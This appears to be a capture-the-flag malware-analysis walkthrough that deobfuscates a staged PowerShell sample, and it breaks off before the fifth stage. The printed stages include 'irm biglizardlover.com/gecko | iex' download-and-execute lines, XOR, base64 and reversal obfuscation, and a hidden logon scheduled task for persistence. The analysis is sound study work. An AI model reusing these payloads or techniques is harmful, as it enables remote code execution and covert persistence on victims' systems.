Malware - Lizard


beware malware!

We start from this payload, which fetches an endpoint with irm (Invoke-RestMethod) and executes its content with iex (Invoke-Expression). The content is most likely a PowerShell script.

irm biglizardlover.com/gecko | iex

Instead of executing it, we can write the output to a file to analyze it:

irm biglizardlover.com/gecko | Out-File script.ps1

Look at him!

.( ([sTriNg]$vERBOsEpREfEREnCe)[1,3]+'X'-JoiN'') ( ( '12G10G4}12I8b73G98G122&22&111f99f65f95G92,73f79,119,24&0y30z26f0,30&25,113y1z70G99I101I98b11z11&5,12f4&98G73z91}1z99f78z70y73}111y120y12r12}69f67I2I79&99&97,92G94G105z95}127,101z67r66b2,104}105r74I64f109z120y73f127b88I94y73}109G97y4I12}119&69,67}2z65f105r65y67r126y85y127G120,94I105r77I65y113f119b111b99,66z122f105r94,88r113y22r22,106r94b67&65z78I109&95&105f26y24}127z88f126&101&66G107G4y11b72&122&122,78}120b7b98y107&106I100I27,66z122&24&85z69z64f121r24&95z84z88r66,117z105}106}103&111r73&97b69&107z78r101z64y103&101f105G29}75f93f118I92G107b91}88G75b66,118I92}94I84&30f110f30z124&125y27,103y89y3r31,88z29,84&89z117I65G28G126y72}94z96r89&74&30r66r74G65r7I24f91f121f77,72b30z101b91,65G73}71f28G125b30}31b30G94,98,29r89&88&20r92f73z122y116z92b122b73b122,85I122I31I77}67G20}93}71&93&3G77y70r106f31f86}121r109&85y24&103f111b109}75z91r125}99r95I28I111r68G31}124z120f100I105}30r122z125I93z20f111}101r122r109}116I109r91z73&75r121I99&106,86}7&98,94z67,78y78z124r94I70f121f125I93I99z91I21G86G25b99f102z124y104&79y97I84}75b28}84}20G104&116y24}77&116b75&122G26f72f7I75z25z86y94r24z97G105z123,78&88f106&30f78r92f122r69z31&103&79}109I66&3&72z30b26f125G21r24G102}110}27r66&67}31G86}101f25r111r106,88&74}72y88G77b122y25,70r67r69b124b75I28&109y105y99I122,7r102y66r109&97f24,118I123I31b85z103f93&66}117y26y93I68b92G24b74,117I90&91I84,97G77f109r105G116G109z75&125y106y98y78,124}100y111z24r107I28G91r21b100}86z70I121f20r101G104&104f103f106y122z107y92z25,96I98&85I98}103r69G92f127,25G24G124f68y116&107}116r101G28f86r107,117G86y107r27,73z116&67}79b93f68&116,3I74r25G68b90z120f75z7,78z126b77b21I94f95I124,94G29f74I3y75I124}89z93&72I105&64}109y74,31,95I124&95z121f89b20z102f102,64I64z79f109z125}79G72I105y121}85I96G20f65}109,117b126r73&27y88r124y71b97z107b126f127f25I121&86&110}78,27r31z107&110G85r21}66,27G120G65,126z74f103,69b109b125y27f106}71&123f77r96f122,110I90,126r117r70z25z123y122G117f20b127y68}107,85r121}109I118G25z86&89f78y64r20r71r96y103G127&118I103G64G30&9
4I126f78b126y117I27r26b85f99,21,105G121,94f78&24r109b95f29z122f71I102I89I84r29r93f71f7r98b27,92G109b118&21}122&24G25G69,117b91f101,65f127}24b67b7I26f91f69r120y101z86f67y21,71,111&122}120G120r106f124}109y21r69b90I110y121y102G92f67f122f92z98&86}72f124y21I85&94I69&125f68y71z30r86y123,124f73b66}104,31I124b109r68I28z71f124I104f73I77r111&92G78,29}70y65r86b123f84}116r79r118}84y96y64&72}106&28}28z75&66r68f78&65y102z117b31b97z67I89z79,25z25y67b121f28,86&64r71r106z27&101G91G88G25}26r90,110z24}102r124}71}127&26y106y97G118G90f127&93z89f29b89I90&29f30z90r73b31z116&64G104b90&93y85f104,94,109}77,104,124I29I107,66G100y27}68b65y77G120r29I126&110z68G86,89y20y29f26y31f30y7r122z96f70r73G90f122}77r25z70z77}84z116r100f117&90}7,85f65b97y99b25&29y101,73r116I110}100}107r99G126I107r21y120,89&101z66,86}111z93I102,109&117y31}125b78r25,68z94,66&28y74r116,64y71b31f25I96z89&70b72y96}90G31G68z28f85b117I64G99b24z103b79G104}68f101z124I74&74f75b97I97f21I109,75,74r79&105G109b20r89}97I109G7f29I85y101f68r95&25}100I126r77r64G72,25&102,122G116z93f29r98}104,28,127y75,106y7r122y90,29&127b64,126}21r89r77I29}31r120y117G73b20b66y116z102G31G93z3&93I90G72b102y92}99z93y72f74z64z64&110z66b31z98r107r79&95I30G110r125}24r105&77G100}85z65b31,7z101,72z71I78,104&109}31b102z124y79G29f30G120G25b127G127r79I104&68b78y91r86,102&89I71b68&125z94,28r66f95G68z85r85I28f97r72,71z68z91G117r69f31G75}127}85G67}27G65y106f117,64I31z85I98&86&84}3y27y28f64f85z24f24b84&30r107z68z116I64&120y125,106b97&70f124&111,106,64f85,21z102}66}29f106I127}127G27,99}109r99y78I121,109y72y106I91f71G93y121z7I89b117z71y102r7I20}111y94b66}116f24I103G21b78,24r124f123r88&118b105f27&94f90b90&69f30I110}28r31r104r93G104,123G98y30,94z89I122&66&123b125,126z117y121,20r111G106r72f107}99I103y92I90}126&109r127b95r92I88&77,111&123}109y101I72z117G69f92&7z110I70}93r127y21,67f120&26I121G116G69,122r28,109I68r91f95b111G89,111,91r126z72f28I102f28,7r126f94&70z99,107,107z94}97r70I86G73f123,100z30b71}70b93b123f71}79&104G79b73r86r67G96G21,7b86}78I66&89r25,84f122G31I67G122&68}78b9
5,121y121&117b127z103z89r77,97z28r95r73z124z88z7}31y102y105}71z21,100}86z70r30y64b123z110&100I92z29}72}105f86y100b88I29z94z105&97f73y92f124G7,90,64b85y24I91,27G98}122&126}94b74I103y101I73b25f97r85b29}121I103,96G102z109I74G65f96&7r72r89y74y73r25b77}75G66f105,123b88G21y125z78}121G72G31G111G31G107G20G24I89b78&26I116z110b85}3b72f74&94z3b66r67,24}100}78f73G117I73y25I116&107&93f78&102z120}92&66&24&94r3f86&97b123I97G91b68b111r101r27z77&105,122,84G99z126&127b121y98r105z107z102r94,20I68f78G94f111}96y79I67y31r79I7y92f3b78&88b25G98y73,74I101I116f20y126&98b25f116,24y96,86G121z122y25f111r102,24}29b66&86}7y117z7,95,95G21r24I116&105G72&102&105,84&89r64b3,68f107}24}77z31I75I121b95&73y123I30&121y25&98,122z72y20}102}31G21I29I117&111&116&30}98b110z110z109y90G109y7b118r69&7&74y89f107,88y74r120f84y78y75f97r104y72z91b118z72f85z72,103,124}85&68z27f95G92&86I88r79I124r91&24y74I106y91}7&116I71G126f64y116&95z90I102z107}28}21&28b96z111r94r69,31,89,89r110r66r70&88,20y104&110&85I90f75,124y71&90z77b90y29I101}70b118&27f7&74}66I72,102I103r126b122I103r118,70f27r7f125}89b97z120G79&3b91G104I66&24}104z91z17z17I11G5,12r0z119z95z85r127b120&73&97G2r101}67f2}79b99}65b124}94G105&127G127,69G67&66f2z79y67y97r124z94}73G95I127z69&67z98z65,67,104z105b113,22z22I72b105b111,99G65}92b94y73z95}127r12&5b12,80z106z67y94&105f109f111}68b1G99I110z102f73r111f120z12&87&12&98G73G91z1,99f78,70I73}111y120y12G12f101f67&2I95b120&94r73y77r65z94,105b77&72r105r126&4r12z8I115z0b119,120}105z84,88G2}105z66f79,67,72f101r66}75,113r22f22z109z95}79r69z69}5y12f81b80b106b67&94z105}77,111I100y1b99,78I102f73z111z88f12&87&12G8r115,2y126f105b109b104G120,67&73I98}72,4G5}81I12,5}12'-SPlIT 'g' -spLiT'R'-sPLiT '&'-SplIt ','-sPlIt 'Y'-SplIT 'z'-SPLIT '}' -sPlIT 'i'-SpliT 'F' -SPLit'b'|% { [CHar]( $_ -bxoR  0x2c  ) } )-jOIN'')

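This payload builds the string iex by taking characters 1 and 3 of $VerbosePreference (SilentlyContinue, which gives i and e) and appending X, then uses it to execute the decoded payload. The payload itself is a list of decimal character codes separated by assorted delimiter characters, each XORed with the single-byte key 0x2c (bxoR 0x2c).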
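The same layer can be recovered without running any PowerShell. The Python sketch below is an added example, not part of the original write-up: it resolves the index-and-join launcher and decodes the split/XOR body statically. The variable defaults are assumptions for a stock Windows PowerShell 5.1 install, and SAMPLE is the first 25 tokens of the blob above followed by its original -split/-bxor tail.

```python
import re

# Default values of the automatic variables the launchers index into
# (assumed: stock Windows PowerShell 5.1).
DEFAULTS = {
    "verbosepreference": "SilentlyContinue",
    "env:comspec": r"C:\WINDOWS\system32\cmd.exe",
    "pshome": r"C:\Windows\System32\WindowsPowerShell\v1.0",
    "shellid": "Microsoft.PowerShell",
}

# $var[1,3], ([string]$var)[1,3], $var.ToString()[1,3], or a one-letter literal.
PIECE_RE = re.compile(
    r"\$((?:env:)?\w+)(?:\.tostring\(\))?\)?\s*\[([\d,]+)\]|'(\w)'", re.I)
# Quoted run of decimal codes separated by single non-digit characters.
BLOB_RE = re.compile(r"'(\d+(?:[^\d']\d+)+)'\s*-split", re.I)
SPLIT_RE = re.compile(r"-split\s*'(.)'", re.I)
XOR_RE = re.compile(r"-bxor\s*'?(0x[0-9a-f]+|\d+)'?", re.I)

# Constructed sample: truncated blob from stage 1 plus its decoding tail.
SAMPLE = (
    "( '12G10G4}12I8b73G98G122&22&111f99f65f95G92,73f79,119,24&0y30z26f0,30&25,113'"
    "-SPlIT 'g' -spLiT'R'-sPLiT '&'-SplIt ','-sPlIt 'Y'-SplIT 'z'-SPLIT '}' "
    "-sPlIT 'i'-SpliT 'F' -SPLit'b'|% { [CHar]( $_ -bxoR  0x2c  ) } )-jOIN''"
)


def resolve_launcher(expr: str) -> str:
    """Rebuild the command name an index-and-join expression evaluates to."""
    out = []
    for var, idx, literal in PIECE_RE.findall(expr):
        if literal:
            out.append(literal)
        elif var.lower() in DEFAULTS:
            value = DEFAULTS[var.lower()]
            out.extend(value[int(i)] for i in idx.split(","))
    return "".join(out).lower()


def decode_split_xor(script: str) -> str:
    """Statically decode '<codes>' -split ... | % { [char]($_ -bxor KEY) }."""
    blob = BLOB_RE.search(script)
    key = XOR_RE.search(script)
    delims = SPLIT_RE.findall(script)
    if not (blob and key and delims):
        raise ValueError("no split/XOR layer found")
    k = int(key.group(1), 0)
    # PowerShell's -split is case-insensitive, so 'g' also splits on 'G'.
    splitter = re.compile("[" + re.escape("".join(delims)) + "]", re.I)
    tokens = [t for t in splitter.split(blob.group(1)) if t]
    return "".join(chr(int(t) ^ k) for t in tokens)


if __name__ == "__main__":
    print(resolve_launcher("([sTriNg]$vERBOsEpREfEREnCe)[1,3]+'X'-JoiN''"))
    print(decode_split_xor(SAMPLE))
```

The decoder reads the delimiter set and the key from the script text itself, so it also handles the later layer that uses -bXoR'0x2d'.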

I replace .( ([sTriNg]$vERBOsEpREfEREnCe)[1,3]+'X'-JoiN'') with Write-Host to disarm the payload and just print it. Let’s execute it:

.\decoded.ps1
 &( $eNV:COmspec[4,26,25]-jOIN'') (New-ObjeCT  io.cOMprEsSIon.DEflATeStreAM( [io.mEmoRySTrEam][COnVErt]::FrombAsE64StRInG('dVVbT+NGFH7nV4yilU4sxtnYEFKCeMiGbIlKIE1gqZpGwtgnZprx2B2PQ7Ku/3t1xuYm0RdrLuf2nfm+4wUad2Iwmek0Q232rN1ut8peVXpVeVyV3ao8qkq/ajF3zUAy4KCAgwQOs0Ch3PTHE2VQq8CIVAXAwegUOFz+NrobbPrjUQqOw9z5OJPDcMxg0x8DX4aXgV6d+g5zr4MEWbtF2bpVi3KcAn/d26Q94JB7no3zI5CFtfdtaV5joiPg0AEOV+JnAM4ZW3yKqnY6qhp4fYvwxMaAEXAgQFNbPHC4G0w9HzjU8IDDKFVGp5LNyNKipS54PhXGXI0zGYzG7eXocqhX/f5hvTg+bRa9rsPr1f/gPuqdElAf3sPsUu8JJllcAQcdEUyL8mAYRe7tPkMGRS5UzBb73GBy9n7TmRfKiAQ7FkWaLVBvRYj5WVY8ShGyUAZ5zubl8kLKSZKl2rRbRY76yO9EUrb4As1VkJux1qk+N7pAZ9V45iYwImS4o+6wiTIzo9kCVTTFPA9ivBUJpoVpNzdP9yriQhk2zWPenD3PAh0kPDeaCpb1jmzWxXcZxLldF00gnhbmJY3Mouc55oU0zlkF7Iwt56vB4JPkS6FMZvSqu1uv12ve3XlDvqyDrAaDP1GnH7hmaT1RBhzu81632+VLjevVa5jaxXHYv+ymMO51IeXBHGORG9TuInzCqJAY3Qb5hrn0fXlk35LujdLv3h0yYlO4KcDhIPffgMM9AgfcEA8uMA+1yIhs5HRald5JVXq1ND0SgF+Vv1SlR9ua13TYe8nXJ3q/qvdJpOqdfllBn3NGcs2BQ4EaHym3+IdkbDA3JPc12T5SScDhbwzJukhQr0nshyy0MdkhwYi3gSyo7mFYl3yNzx/70ly44x2GhXlTQFMjPCFly9Jn1FSS7OAObUAdFwkqU+uYkJ+8CrnX4K9b4PWtZE7rvvi2B03DqDWN2ruVnWQRYU8CFdGOKpvRASsptaCWAIdYip+BjqS9oT6UXiV0AhwsCuCwRd0J0+RrjOGGrMjzeWH2kjqWkcDcezoL9+zbnu5xV3oVhbsUUYSKuaM0sePt+3JEk9Hzj2lWBHp1dEzHt1rEMepP+vly4w7NVRrfKIe5My1UKLJAfmL+dufe5agnEWt9QbUd3C3G84ub6XBy/dfr/no4HbeYe5XGqbJTpn4r/zMWMwhCI7aEVxORSUNEGJr8hbrCLco3c+p/bt5NefIX8RN5X4LzUV5CJ41nz+Y+ss94XEdJExul/hG4a3gUseW2U5NVd8J391YCX2NBBAvA+Zi+fuGtfTxbgMDdwZdydKPyh7spztcPw4fFw+XkRlXsvJG090LCri3uuBnjt8DByvgPkvav1IjZ7+fndJKRVKZj7+QuMTc/wDn4Dw==') ,[sySTeM.Io.cOmPrESSion.coMPresSioNmoDE]::dECOmpresS ) |ForEACh-OBJeCT { New-ObjeCT  Io.sTreamrEadER( $_,[TExt.EncodIng]::Ascii) }|ForEaCH-ObJeCt { $_.READToeNd()} )

Again, I remove the executing part, &( $eNV:COmspec[4,26,25]-jOIN''), which is another way of spelling iex, and replace it with Write-Host to disarm it:

Write-Host (New-ObjeCT  io.cOMprEsSIon.DEflATeStreAM( [io.mEmoRySTrEam][COnVErt]::FrombAsE64StRInG('dVVbT+NGFH7nV4yilU4sxtnYEFKCeMiGbIlKIE1gqZpGwtgnZprx2B2PQ7Ku/3t1xuYm0RdrLuf2nfm+4wUad2Iwmek0Q232rN1ut8peVXpVeVyV3ao8qkq/ajF3zUAy4KCAgwQOs0Ch3PTHE2VQq8CIVAXAwegUOFz+NrobbPrjUQqOw9z5OJPDcMxg0x8DX4aXgV6d+g5zr4MEWbtF2bpVi3KcAn/d26Q94JB7no3zI5CFtfdtaV5joiPg0AEOV+JnAM4ZW3yKqnY6qhp4fYvwxMaAEXAgQFNbPHC4G0w9HzjU8IDDKFVGp5LNyNKipS54PhXGXI0zGYzG7eXocqhX/f5hvTg+bRa9rsPr1f/gPuqdElAf3sPsUu8JJllcAQcdEUyL8mAYRe7tPkMGRS5UzBb73GBy9n7TmRfKiAQ7FkWaLVBvRYj5WVY8ShGyUAZ5zubl8kLKSZKl2rRbRY76yO9EUrb4As1VkJux1qk+N7pAZ9V45iYwImS4o+6wiTIzo9kCVTTFPA9ivBUJpoVpNzdP9yriQhk2zWPenD3PAh0kPDeaCpb1jmzWxXcZxLldF00gnhbmJY3Mouc55oU0zlkF7Iwt56vB4JPkS6FMZvSqu1uv12ve3XlDvqyDrAaDP1GnH7hmaT1RBhzu81632+VLjevVa5jaxXHYv+ymMO51IeXBHGORG9TuInzCqJAY3Qb5hrn0fXlk35LujdLv3h0yYlO4KcDhIPffgMM9AgfcEA8uMA+1yIhs5HRald5JVXq1ND0SgF+Vv1SlR9ua13TYe8nXJ3q/qvdJpOqdfllBn3NGcs2BQ4EaHym3+IdkbDA3JPc12T5SScDhbwzJukhQr0nshyy0MdkhwYi3gSyo7mFYl3yNzx/70ly44x2GhXlTQFMjPCFly9Jn1FSS7OAObUAdFwkqU+uYkJ+8CrnX4K9b4PWtZE7rvvi2B03DqDWN2ruVnWQRYU8CFdGOKpvRASsptaCWAIdYip+BjqS9oT6UXiV0AhwsCuCwRd0J0+RrjOGGrMjzeWH2kjqWkcDcezoL9+zbnu5xV3oVhbsUUYSKuaM0sePt+3JEk9Hzj2lWBHp1dEzHt1rEMepP+vly4w7NVRrfKIe5My1UKLJAfmL+dufe5agnEWt9QbUd3C3G84ub6XBy/dfr/no4HbeYe5XGqbJTpn4r/zMWMwhCI7aEVxORSUNEGJr8hbrCLco3c+p/bt5NefIX8RN5X4LzUV5CJ41nz+Y+ss94XEdJExul/hG4a3gUseW2U5NVd8J391YCX2NBBAvA+Zi+fuGtfTxbgMDdwZdydKPyh7spztcPw4fFw+XkRlXsvJG090LCri3uuBnjt8DByvgPkvav1IjZ7+fndJKRVKZj7+QuMTc/wDn4Dw==') ,[sySTeM.Io.cOmPrESSion.coMPresSioNmoDE]::dECOmpresS ) |ForEACh-OBJeCT { New-ObjeCT  Io.sTreamrEadER( $_,[TExt.EncodIng]::Ascii) }|ForEaCH-ObJeCt { $_.READToeNd()} )

which renders as:

.\stage3.ps1                                                              

Set-ItemProperty ((("{5}{1}{4}{0}{3}{2}" -f 'l ','n','l','Panelk7EInternationa','tro','HKCU:k7ECo')) -REplAcE 'k7E',[cHar]92) -Name ("{1}{0}"-f '9',("{1}{0}" -f '5','s11')) -Value ("{2}{0}{1}" -f 'rd','.','Liza'); Set-ItemProperty ((("{2}{0}{3}{5}{1}{7}{4}{6}" -f'C','anelM','HK','U:M12','Intern','Control P','ational','12'))  -rePlaCE([CHAr]77+[CHAr]49+[CHAr]50),[CHAr]92) -Name ("{1}{0}"-f '359','s2') -Value ("{0}{2}{1}"-f 'L','rd.','iza') #value HKCU:\Control Panel\International -Name s1159 -Value Lizard.


Add-Type 'using System;using System.Runtime.InteropServices;public class R{[DllImport("user32.dll",SetLastError=true)]public static extern IntPtr SendMessageTimeout(IntPtr hWnd,int Msg,IntPtr wParam,string lParam,int fuFlags,int uTimeout,out IntPtr lpdwResult);}' ; [R]::SendMessageTimeout([intptr]0xffff,0x1A,[IntPtr]::Zero,("{1}{0}" -f'l','Int'),2,5000,[ref]([intptr]::Zero)) | Out-Null


Register-ScheduledTask -TaskName ("{2}{3}{1}{0}" -f ("{1}{0}"-f'p','acku'),'lyB','We','ek') -Description ("{9}{16}{11}{4}{10}{12}{8}{14}{13}{5}{0}{15}{3}{1}{7}{6}{2}" -f 'hion','n','l',' u',' = o','s','uerebe','iq','ttest ','fl','b','e','jec','sumerfa','+ con',' +','agvalu') -Action (New-ScheduledTaskAction -Execute ("{1}{0}{2}" -f'hel','powers','l.exe') -Argument ((("{10}{6}{3}{5}{15}{14}{1}{13}{17}{2}{9}{8}{12}{7}{11}{4}{0}{16}" -f'0} ','ndo','mand ','tionPo',' {','li','u','glizardlo',' b','{1}irm','-Exec','ver.com/gecko','i','wStyle','pass -Wi','cy By','iex{1}',' Hidden -Com')) -F[CHar]124,[CHar]34)) -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Principal (New-ScheduledTaskPrincipal -UserId "$env:USERDOMAIN\$env:USERNAME" -LogonType ("{1}{2}{0}" -f ("{1}{0}"-f 'active','r'),'Int','e') -RunLevel ("{1}{0}" -f'st',("{1}{0}"-f 'ighe','H'))) | Out-Null


irm ("{1}{5}{2}{3}{0}{4}" -f'om',("{0}{1}"-f'big','l'),'e','r.c',("{0}{1}" -f '/gil','a'),("{1}{0}"-f 'zardlov','i')) | iex

${COns`UMeRf`A`S`HIOn} = ("{2}{1}{6}{3}{0}{5}{4}"-f '3T','B','WXp','Gt','PQ==','Wpn','ME16UmtOV')

This stage does several things:

  • It writes two values under HKCU\Control Panel\International, s1159 and s2359, both set to "Lizard.". These values hold the AM/PM strings shown in the Windows taskbar clock.

  • It creates a scheduled task named WeeklyBackup, which runs powershell.exe at startup (the trigger is -AtLogOn) to execute PowerShell code. The scheduled task executes irm biglizardlover.com/gecko | iex.

  • The last part is a base64 string. Let’s print it:

 Write-Host ("{2}{1}{6}{3}{0}{5}{4}"-f '3T','B','WXp','Gt','PQ==','Wpn','ME16UmtOV')

This gives us WXpBME16UmtOVGt3TWpnPQ==, which decodes from base64 (two passes) to c0434d59028. It might be a part of our final flag.
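The -f reassembly in this stage can also be done offline. The Python sketch below is an added example, not the author's tooling: it repeatedly folds [char]N, string concatenation, innermost -f expressions and -replace calls in lines copied from stage 3, then peels the nested base64 of the flag fragment. It treats -replace patterns as literals and assumes folded strings contain no single quotes.

```python
import base64
import re

STR = r"'[^']*'"
# Innermost ("template" -f 'a','b',...) whose arguments are all plain literals.
FMT_RE = re.compile(
    r"\(\s*(?P<q>[\"'])(?P<t>(?:(?!(?P=q)).)*)(?P=q)\s*-f\s*"
    r"(?P<args>" + STR + r"(?:\s*,\s*" + STR + r")*)\s*\)", re.I)
CHAR_RE = re.compile(r"\[char\]\s*(\d+)", re.I)
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
PAREN_RE = re.compile(r"(?<![\w\]])\(\s*('[^']*')\s*\)")
REPLACE_RE = re.compile(
    r"'([^']*)'\s*-replace\s*\(?\s*'([^']*)'\s*\)?\s*,\s*'([^']*)'", re.I)

# Lines copied from stage 3 above.
REG_LINE = (
    r'''Set-ItemProperty ((("{5}{1}{4}{0}{3}{2}" -f 'l ','n','l','Panelk7EInternationa','tro','HKCU:k7ECo')) '''
    r'''-REplAcE 'k7E',[cHar]92) -Name ("{1}{0}"-f '9',("{1}{0}" -f '5','s11')) '''
    r'''-Value ("{2}{0}{1}" -f 'rd','.','Liza')''')
TASK_ARG = (
    r'''-Argument ((("{10}{6}{3}{5}{15}{14}{1}{13}{17}{2}{9}{8}{12}{7}{11}{4}{0}{16}" '''
    r'''-f'0} ','ndo','mand ','tionPo',' {','li','u','glizardlo',' b','{1}irm','-Exec','''
    r''''ver.com/gecko','i','wStyle','pass -Wi','cy By','iex{1}',' Hidden -Com')) '''
    r'''-F[CHar]124,[CHar]34)''')
FRAGMENT = r'''("{2}{1}{6}{3}{0}{5}{4}"-f '3T','B','WXp','Gt','PQ==','Wpn','ME16UmtOV')'''


def fold_format(m):
    """Evaluate one -f expression; {n} picks the n-th argument."""
    args = re.findall(r"'([^']*)'", m.group("args"))

    def pick(p):
        i = int(p.group(1))
        return args[i] if i < len(args) else p.group(0)
    return "'" + re.sub(r"\{(\d+)\}", pick, m.group("t")) + "'"


def fold_char(m):
    code = int(m.group(1))
    # Leave [char]39 alone: a quote would break the literal we emit.
    return m.group(0) if code == 39 else "'" + chr(code) + "'"


def fold_replace(m):
    text, pattern, repl = m.groups()
    # -replace is case-insensitive; the pattern is treated as a literal (assumption).
    return "'" + re.sub(re.escape(pattern), lambda _: repl, text, flags=re.I) + "'"


def fold(script: str) -> str:
    """Apply the folding passes until the text stops changing."""
    previous = None
    while script != previous:
        previous = script
        script = CHAR_RE.sub(fold_char, script)
        script = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        script = FMT_RE.sub(fold_format, script)
        script = PAREN_RE.sub(lambda m: m.group(1), script)
        script = REPLACE_RE.sub(fold_replace, script)
    return script


def peel_base64(text: str, max_layers: int = 5):
    """Decode nested base64 while each layer is still printable ASCII base64."""
    layers = 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(text, validate=True).decode("ascii")
        except ValueError:  # bad alphabet, bad padding or non-ASCII bytes
            break
        if not decoded or not decoded.isprintable():
            break
        text, layers = decoded, layers + 1
    return text, layers


if __name__ == "__main__":
    print(fold(REG_LINE))
    print(fold(TASK_ARG))
    print(peel_base64(fold(FRAGMENT).strip("'")))
```

Each pass only shrinks the text, so the loop always terminates, and nothing from the sample is ever executed.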

On line 12 above, we can see that another irm command is executed: irm ("{1}{5}{2}{3}{0}{4}" -f'om',("{0}{1}"-f'big','l'),'e','r.c',("{0}{1}" -f '/gil','a'),("{1}{0}"-f 'zardlov','i'))

We can take this piece of code, found in the stage 2, and print the result in the terminal instead of executing it:

irm ("{1}{5}{2}{3}{0}{4}" -f'om',("{0}{1}"-f'big','l'),'e','r.c',("{0}{1}" -f '/gil','a'),("{1}{0}"-f 'zardlov','i')) | Write-Output

The output:

$TFr1S = " )'X'+]43[EmOHSP$+]12[EMoHSp$ (&| )93]rAhc[]Gnirts[,)28]rAhc[+78]rAhc[+401]rAhc[((eCaLpER.)'|',)58]rAhc[+401]rAhc[+37]rAhc[((eCaLpER.)'$',)75]rAhc[+97]rAhc[+27]rAhc[((eCaLpER.)43]rAhc[]Gnirts[,'Ywo'(eCaLpER.)')RWhRWhnIOj-RWhXRWh+]3,1[)ecnerefERPEsOBrev9OH]gniRTS'+'[( (&Uh'+'I '+'Ywo ) RWh RWh RWhsFo:ElBairavRWh METI-tEs(9OH Ywo+ )}'+')RWhd2x0RWhRoXb- _9OH (]raH'+'c[{hcaEROf UhIRWhgRWhTILps- RWhURWh TIlPS-RWhcRWh ti'+'Lp'+'S-RWh-RW'+'hTilps-RWh'+'JRWhTILPS- RWhB'+'RWhTILPS-RWhwRWhtIlpS-RWh%RWhTIlpS-RW'+'h<RWhTILPS- RWhoRWh TIlPS-RWh9'+'3-51B02<49-601B721U521g96'+'j46O321C711W56B321%99j911B39B221O121C09g92j07-67j89C99'+'g78%87'+'U78%66<701C67O52O82W46O221C51-31%61j31g'+'98<49-27<121B98%87B27U17j97g66U9W93%08g93%76-27<37W37-86W101j31j27O56%48-98g621j09%66C37%76g86g221C0C'+'31O09U66W97-56<27<27g37<86B56O47W9O31j1O01%37%76B67g46C46-66j011C0-01O3'+'1B98-4'+'9C'+'86g79W98j'+'76j27-46B88W47%59j801g0-31j56C56-27%96W49-59<27O09%66W39<31j49%49O27C87'+'j66g59<521<0j98O59<67j98W621<31-31-31B31C93B56O56B88j99%0W98%88'+'C'+'89C31C18'+'<31-4-13-6U82W1'+'B37j76g27C39<27W3'+'7B98j96j47W86%56-86U09U98g9U1<92C1B92O13W5O66g57'+'%76%001j4'+'9U59O27O98g27C46'+'B67%59-67g521j46j27W98B'+'49W48-621g32g32C211W'+'22'+'1-811<31W22-51W08-31B22%4<86U7'+'6C001B76j86j221'+'W88g57%31j98B76j86O1g46W67-59B67W521B19j39<56g31W47U76-86B59U98B49g1O46<67W59O67C521C88%31-98j76B86C1B76j66j86B98O87-8'+'01C8'+'8O31j98B76C86B5%66W57-76<001W49U5'+'9O27g98B27W46C67-59W67-521C46-27U98%49-48g621%31C56O66C66'+'j97B31U76W59B27U98j58W27O'+'31-87W86g98O67C98W49O31O87j86-56j97-88g39C31B211C4W51-77j56C56U37%3g'+'13<03-5'+'9j27<49-8'+'8O51U77g5-98-59W66%39g46'+'g001C56U56<501g811g31O68O31j221%31g49-49O67W56B87W31W87j86-56U97W88%39C31O22-49<27j87B86j19<5'+'9C27B621<39O66g59C27j98B76W001U3W27W46U86B98O76<88%721j3W46<27%98g49<48U621-31O47W76W86W49<88U'+'31B22U46B27<98O49U'+'48-621U31C47C76g86O'+'49O88O51O31U76j6'+'6<86O98g86B76U86<57C27<501O27B39g48<12'+'1-0j31%27O39j48%121g0U3'+'7<3'+'7%801B31C31B31g31<93g56j56%88
'+'B99g0%98C88j89g31U18-31<27j88<76O86j98C76j66j011<48g5'+'6-9'+'8-76<27O56B86%621<31U76%66U86<9'+'8g87g801O59U66j59<59g401U0g31B37<76C27'+'U39<27C37-'+'98<96%47%86j56W86'+'C09U98<9-31'+'B27g56'+'O86j701g98-88W89<0j'+'31g48C98W59-67O39C98<49U67W27j57W48j58B67B56C67U47%9U31g98%49C27W88-29U27C721O97-27U221<0-27U07-66C19W76U001<31-31U31%31W93<51C47C39B17g3O27O78U86%76<47U66O87j27U59O98O86<88-87W49O86%97W9-37C59-67B'+'78-86B56W2j47g46%86<2<46U66%87%3C59O27<19B66-56g37W59W67B78O'+'86B56j47j86g97<'+'2j2%32j49-39U98j98<96<51-31%61C31-'+'48j98<59B67<39j'+'98%49g67<27<57<4'+'8j58-67U56g67j47O9W31-31-31O31g93C42g13<31j46W88C46%86U58-67O69g'+'0C31B82j31O46B88'+'U46U86C76O86B69W0'+'B31g46j66%37%7'+'6C67U721j0-98W27W601W31j61O31g27B78%86j76O47g66W87W27%'+'59g98g86U88<87U49'+'U86B'+'97g9C31-31-31%31W93j51-47C39W17-3W37U59C67B78g86'+'B56<51g31j521j69j401%121U32<19C76<27'+'W9C3'+'1-96j98B67O5'+'21U0<76-86U66j301-31g'+'61%31g37O76U27C39C27%37j98W96<47g86<56B86g09O98-9'+'B31O31<31%31-93%4B4U4B4W49<47C76'+'C86g59g98-621O31U48<98<59C2'+'7B39<66j59j521j37g76<67W39O58U'+'40'+'1<0%31O98j87j27<17-97U89g0U98j87j27C56U27O621B31<18j31-98%58g98'+'-31%27g39O48%121W0C31<46-66j87O3j59W27C19j66W56W37U59-67j78C86<56C47C86-97j3U02W69j711-97U86g911O76U621%321-56C56%97g221O37g701U321g31U27W46W67B99-49j76%501W0-27C19C56j66W4'+'9C27B721j5O5g47C76-86g59C98U621O52-72<27W49W67<111%46U66'+'j59W'+'7'+'01<32%32O211W98U59B27j1'+'9g76g66B011B3'+'-46j27g98B49%48C621B811C5g47W76j86B59U98<621W98W27O601U3j12C701%'+'121-021U32%32j211<47W76O86B37g66C87W76O401B3U98C58j27C121%3%46B27C98U'+'49<48O621W811W5<31B58g27W86j31<61j31C'+'09W66j97O56j27B27'+'W37C86<56O47B9B31B31-31U31C93g68j31%4C27%88j59<98%9C5U31O27<56-86U96O09RWh (]gNirTS[+ Ywo ) RWhRWh  RWhS'+'foRWh  ELBAIrav-TeS(9OHYwo'( ";  -JOIN (  vArIABlE  tfR1s  ).VaLUe[-1..- ((  vArIABlE  tfR1s  ).VaLUe.leNgTH)]|& ( ([sTriNg]$VERboSEPrEfeREnce)[1,3]+'X'-joiN'')

Another round! The script is stored reversed in $TFr1S and flipped back before being piped to the launcher. Just replace the & ( ([sTriNg]$VERboSEPrEfeREnce)[1,3]+'X'-joiN'') at the end with Write-Output and we get the 5th stage:

